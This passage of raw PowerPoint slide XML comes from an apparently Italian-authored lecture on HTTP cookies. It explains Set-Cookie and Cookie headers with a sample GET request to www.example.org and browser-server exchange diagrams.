              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(content of page)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Tabella 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B686767C-EF50-4337-B4D0-42ECB4EAEAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2809876" y="6357939"/>
          <a:ext cx="3000375" cy="274637"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1000125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1000125">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tblGrid>
              <a:tr h="274637">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1200" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>browser</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45773" marB="45773" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1200">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>← </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45773" marB="45773" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1200" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>server</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45773" marB="45773"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9" name="Rettangolo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9657475D-2EAD-4344-891F-213DB28D7108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="2786064"/>
            <a:ext cx="3286125" cy="7143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10" name="Rettangolo 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1AF7952-94C9-4910-85F0-54CBF3390D05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="5000626"/>
            <a:ext cx="3286125" cy="128587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11" name="Rettangolo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36CC74C7-3EA1-4541-B605-613FB02958E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="3571876"/>
            <a:ext cx="3286125" cy="214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12" name="Rettangolo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C230E3-3ACB-4653-B060-4E05295AA2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="6357938"/>
            <a:ext cx="3286125" cy="214312"/>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15" name="Rettangolo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558B8DDD-DC25-44E0-922A-154A6BA6EB62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809751" y="3857626"/>
            <a:ext cx="8429625" cy="1154113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The server replies by sending the requested page preceded by a similar packet of text, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'HTTP response'. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This packet may contain lines requesting the browser to store cookies:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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B5126B-24DB-42A4-855E-8C7F13176C18}"/>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Setting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> a cookie (2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDE504E-BF1E-4E8B-A94C-22C00AFFBE71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8401050" cy="2114550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>The server sends lines of Set-Cookie only if the server wishes the browser to store cookies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0"/>
              <a:t>Set-Cookie is a directive for the browser to store the cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6800" dirty="0"/>
              <a:t>Send it back in future requests to the if the browser supports cookies and cookies are enabled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0121C88-7244-446E-AD34-6A13DF82E1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2524125" y="3429001"/>
            <a:ext cx="37147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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /spec.html HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.example.org</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: name=value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept: */*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabella 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB07A09-F4F5-4693-A4BA-AC2AB64C4DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2595563" y="4384676"/>
          <a:ext cx="2857500" cy="258763"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="952500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="952500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="952500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="258763">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>browser</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45563" marB="45563" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>→ </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45563" marB="45563" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>server</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45563" marB="45563" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE52A27-20CE-4B14-A530-C8125334920A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524126" y="3429000"/>
            <a:ext cx="3286125" cy="857250"/>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7" name="Rettangolo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2ED2C0-6C86-422A-86DF-DAB7939F8BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524126" y="4429126"/>
            <a:ext cx="3286125" cy="214313"/>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it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CasellaDiTesto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C373AA17-C22E-43CD-B528-DA552A5EE52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2024063" y="4714876"/>
            <a:ext cx="8286750" cy="2425279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The server answers by sending the requested page, possibly adding other cookies as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The value of a cookie can be modified by the server by sending a new Set-Cookie: name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>newvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> line in response of a page request. The browser then replaces the old value with the new one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin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563303-2DF4-4E96-B9D4-127FDE5BA58A}"/>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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:br>
